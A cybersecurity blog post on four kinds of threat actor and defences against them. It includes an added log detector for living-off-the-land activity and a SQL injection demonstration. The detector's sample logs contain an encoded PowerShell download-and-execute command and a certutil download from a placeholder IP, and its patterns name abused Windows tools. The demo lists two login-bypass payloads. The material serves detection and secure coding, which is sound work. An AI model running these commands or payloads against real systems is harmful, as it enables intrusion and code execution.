February 2023 Blog

A Brief Overview of Threat Actors


[Figure: the four threat-actor categories discussed below: State-Sponsored, Organized Crime, Individuals/Insiders, Hacktivists]

In 2023 we are likely to see the following types of Threat Actors:

  • State-Sponsored Groups
  • Organized Crime/Ransomware Groups
  • Individuals and/or Insiders
  • Hacktivist or Cause-Related Groups

Each of these types of threat actor has different motivations and, in some cases, different methods. Understanding the objectives and techniques of each group allows companies to better prevent attacks or, at a minimum, remediate and recover from them. For this month's blog, I am leaning on an excellent LinkedIn article by Mr. Joe Clarke, Security Program Manager at IBM Cloud (see https://www.linkedin.com/pulse/threat-actors-who-why-should-we-care-joe-clarke-cism-).

State-sponsored groups are a real and increasing threat in 2023. Their objectives may be to gather foreign intelligence on security weaknesses, to exfiltrate sensitive data (steal secrets), and to create social tension and societal disruption (as Russia did during the recent US election). In some cases, as with North Korea, the state-sponsored actor must also operate for financial gain, through crypto-mining and/or large ransom payments, in order to supplement a weak domestic economy and obtain foreign currency. In other cases, state-sponsored actors seek to disrupt infrastructure in a target country as part of a medium- to long-term goal of degrading the victim's economy and military preparedness. State-sponsored actors are typically very sophisticated, and their primary aim is persistent, long-term access to the victim's systems. They often carry out extensive reconnaissance and will not hesitate to recruit insiders who are motivated by personal financial gain. They favor "living-off-the-land" techniques and fileless malware, which abuse legitimate, already-installed system tools rather than dropping easily detected executables; such intrusions are characterized by long dwell times and gradual privilege escalation. The best prevention is a multi-layered, defense-in-depth posture, combined with regular backups and the willingness to isolate and remediate any infected system immediately.
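Because living-off-the-land activity hides behind tools that are legitimately present on every host, the practical defense is to watch how those tools are invoked rather than whether they exist. The following is an added example (not code from the original post or from the cited article): a small detector that scores process-creation telemetry for stacked indicators such as an Office application spawning PowerShell, a hidden window, and an encoded command whose decoded contents download and execute code. The log-line layout, the watchlist of abused binaries, the scoring weights, and the sample lines (including the hostnames, user names and the 203.0.113.7 documentation-range address) are all assumptions constructed for illustration.

```python
"""Flag living-off-the-land (LOTL) activity in process-creation logs.

Added example, not code from the original post or the cited article.
The log line format, the LOLBin watchlist, the scoring weights and the
sample lines are assumptions constructed for illustration; the fields loosely
follow what Sysmon Event ID 1 / EDR process-creation telemetry records.
"""
import base64
import re
from dataclasses import dataclass, field

# Legitimate Windows binaries commonly abused for fileless execution (assumed watchlist).
LOLBINS = {"powershell.exe", "certutil.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wmic.exe", "bitsadmin.exe", "msiexec.exe"}

# Parent processes that should not normally spawn a LOLBin (macro-driven phishing).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}

# PowerShell -EncodedCommand and its abbreviations, followed by a base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)

# (label, pattern): command-line content that is rarely benign in an enterprise.
SUSPICIOUS_ARGS = [
    ("encoded-command", ENC_RE),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("invoke-expression", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("web-download", re.compile(r"DownloadString|DownloadFile|Net\.WebClient", re.I)),
    ("certutil-urlcache", re.compile(r"certutil(?:\.exe)?\s+.*-urlcache", re.I)),
    ("regsvr32-remote-scriptlet", re.compile(r"regsvr32(?:\.exe)?\s+.*/i:https?://", re.I)),
    ("mshta-inline", re.compile(r"mshta(?:\.exe)?\s+(?:https?:|vbscript:|javascript:)", re.I)),
]

# Assumed log line layout: <ts> host=<h> user=<u> parent="<path>" image="<path>" cmd="<cmdline>"
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+'
    r'parent="(?P<parent>[^"]*)"\s+image="(?P<image>[^"]*)"\s+cmd="(?P<cmd>.*)"$'
)

@dataclass
class Finding:
    ts: str
    host: str
    image: str
    score: int
    reasons: list = field(default_factory=list)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def parse_line(line):
    """Return the event fields as a dict, or None for a line that does not fit the layout."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def decode_encoded_command(cmd):
    """Decode a PowerShell -EncodedCommand blob (base64 of UTF-16LE text), or None."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(ev):
    """Score one process-creation event; higher means more LOTL indicators stacked together."""
    score, reasons = 0, []
    image, parent = basename(ev["image"]), basename(ev["parent"])
    if image in LOLBINS:
        score += 1
        reasons.append(f"lolbin:{image}")
    # Search the decoded payload too, so base64 encoding cannot hide IEX / WebClient.
    text = ev["cmd"]
    decoded = decode_encoded_command(text)
    if decoded:
        text += "\n" + decoded
        reasons.append("decoded-command")
    for label, pat in SUSPICIOUS_ARGS:
        if pat.search(text):
            score += 2
            reasons.append(f"args:{label}")
    if parent in OFFICE_PARENTS and image in LOLBINS:
        score += 3
        reasons.append(f"office-parent:{parent}")
    return score, reasons

def detect(lines, threshold=3):
    """Parse each line, score it and return the events at or above the threshold."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        score, reasons = score_event(ev)
        if score >= threshold:
            findings.append(Finding(ev["ts"], ev["host"], basename(ev["image"]), score, reasons))
    return findings

# Constructed sample telemetry (hosts, users and the 203.0.113.7 documentation-range IP are made up).
SAMPLE_LOG = [
    r'2023-02-14T09:12:03Z host=WS-042 user=CORP\jdoe parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmd="notepad.exe report.txt"',
    # Word macro spawning hidden, encoded PowerShell; the blob decodes to: IEX (New-Object Net.WebClient)
    r'2023-02-14T09:13:41Z host=WS-042 user=CORP\jdoe parent="C:\Program Files\Microsoft Office\WINWORD.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"',
    r'2023-02-14T09:15:10Z host=WS-042 user=CORP\jdoe parent="C:\Windows\System32\cmd.exe" image="C:\Windows\System32\certutil.exe" cmd="certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\Users\Public\a.txt"',
    # Legitimate scheduled PowerShell: one weak indicator only, stays below the threshold.
    r'2023-02-14T09:20:00Z host=SRV-01 user=CORP\svc_backup parent="C:\Windows\System32\services.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -File C:\Scripts\nightly-backup.ps1"',
    "this line is not telemetry and is skipped",
]

if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f"{f.ts} {f.host} {f.image} score={f.score} {', '.join(f.reasons)}")
```

The scoring deliberately lets a lone indicator (an administrator running a PowerShell script from a scheduled task) fall below the threshold while several weak indicators on one event add up; in a real deployment the weights and watchlist would be tuned against the organization's own baseline of normal administrative activity.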

Organized crime and/or ransomware groups are typically motivated by financial gain. They use a combination of targeted attacks, preceded by extensive reconnaissance of a victim company, and opportunistic attacks broadcast widely at likely victims. The weapon of choice is a phishing email and/or a malicious URL. They also scan for unpatched or misconfigured internet-facing systems and exploit weaknesses such as SQL injection. They will often threaten to post sensitive company information on the dark web, causing reputational damage, unless a ransom is paid, and they encrypt a company's networks and computers as a further means of extortion. The best defenses against such threat actors are cybersecurity awareness training for the company's staff and the implementation and enforcement of a good IT policy and IT hygiene. Again, a multi-layered solution of a reputable firewall, anti-virus and endpoint detection and response (EDR) is vital to preventing and catching these threats. These groups have significant financial resources at their disposal and can deploy malware that has been tested to bypass the firewall and AV, so a defense-in-depth approach is key to improving a company's cybersecurity posture against them. Reliable backups of key data (kept offline or otherwise out of reach of an attacker who controls the network, and tested by actually restoring from them) and contingency planning, along with regular crisis and incident response simulations, are vital to remediating these types of attack.
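The SQL injection these groups scan for is usually a login or search form that pastes user input straight into a query. As an added example (not code from the original post), the block below runs a vulnerable login query and its parameterized replacement against the same in-memory SQLite table with two classic payloads; the schema, the two users, the placeholder "hashes" and the payload strings are constructed for illustration.

```python
"""Vulnerable and hardened versions of a login query, side by side.

Added example, not code from the original post. The schema, the two users,
the placeholder "hashes" and the payloads are constructed for illustration;
SQLite in memory stands in for whatever database the application uses.
"""
import sqlite3

def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)")
    # Placeholder values; a real system stores a salted hash produced by a password KDF.
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "hash-of-alice-pw"), ("bob", "hash-of-bob-pw")])
    return conn

def login_vulnerable(conn, username, password_hash):
    """Builds the statement by string formatting: user input becomes SQL syntax."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password_hash = '{password_hash}'")
    return [row[0] for row in conn.execute(sql)]

def login_hardened(conn, username, password_hash):
    """Parameterized statement: the driver sends values separately from the SQL text."""
    sql = "SELECT username FROM users WHERE username = ? AND password_hash = ?"
    return [row[0] for row in conn.execute(sql, (username, password_hash))]

# Two classic payloads a scanner would try against a login form.
TAUTOLOGY = "' OR '1'='1"      # makes the WHERE clause true for every row
COMMENT_OUT = "alice'--"       # closes the quote and comments out the password check

def demo():
    """Run both query styles with a legitimate login and with each payload."""
    conn = setup_db()
    return {
        "legit_vuln": login_vulnerable(conn, "alice", "hash-of-alice-pw"),
        "legit_hard": login_hardened(conn, "alice", "hash-of-alice-pw"),
        "tautology_vuln": login_vulnerable(conn, TAUTOLOGY, TAUTOLOGY),
        "tautology_hard": login_hardened(conn, TAUTOLOGY, TAUTOLOGY),
        "comment_vuln": login_vulnerable(conn, COMMENT_OUT, "wrong"),
        "comment_hard": login_hardened(conn, COMMENT_OUT, "wrong"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:15} -> {rows}")
```

With the vulnerable query the tautology payload returns every user and the comment payload logs in as alice without a password; the parameterized query returns nothing for either, because the payload is compared as a literal username rather than parsed as SQL. Parameterization fixes the injection; it does not remove the need to patch and correctly configure the systems the scanners are looking for.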

Individuals and/or insiders are among the most difficult types of threat to prevent. A grievance, a lack of loyalty, and/or a desire to fund an extravagant lifestyle through illegal income are the typical root causes of insider threats. Insiders may dwell inside your company for a considerable length of time. They may hand over their usernames and passwords to state-sponsored or criminal threat actors in exchange for payment, or be paid by those actors to install and manage crypto-mining software on company systems. They may delay, confuse and sabotage your internal cybersecurity and defense-in-depth measures, whether by being very reluctant to install defensive controls or by deactivating some or all of your preventive or remedial systems. Some insiders are content to exfiltrate sensitive data as an 'insurance policy' against being made redundant. If the insider is an IT expert, the threat is magnified many times over, as they can do significant long-term damage to the company. The best defenses against insider threats are good employee engagement and human resource policies; regular IT audits by external agencies, such as external Vulnerability Assessment and Penetration Testing (VAPT) and asset inventories; and, of course, implementation of a comprehensive IT and IT hygiene policy, including least privilege and separation of duties, so that no single person can silently disable a control or hold the only credentials to a critical system.

Hacktivists or cause-related groups are a significant challenge because they are not typically motivated by financial gain but by seeking a platform for their cause. They may also seek to inflict reputational damage on a company they deem to be acting contrary to that cause. Sometimes these threat actors are also company insiders, which complicates the task of defending against them. Often, a company's marketing, shareholder relations or senior management team can anticipate and defuse these threats through corporate planning for sustainability, corporate social responsibility and community engagement. As for measures to prevent and/or mitigate these threats, the same advice given for insiders applies.

In summary, knowing what kind of threat actor is opposing you yields insight into how to prevent, mitigate and/or remediate that specific type of threat. Cybersecurity is a team sport: you will need to educate and engage your employees so that they help the company implement its defense-in-depth security posture.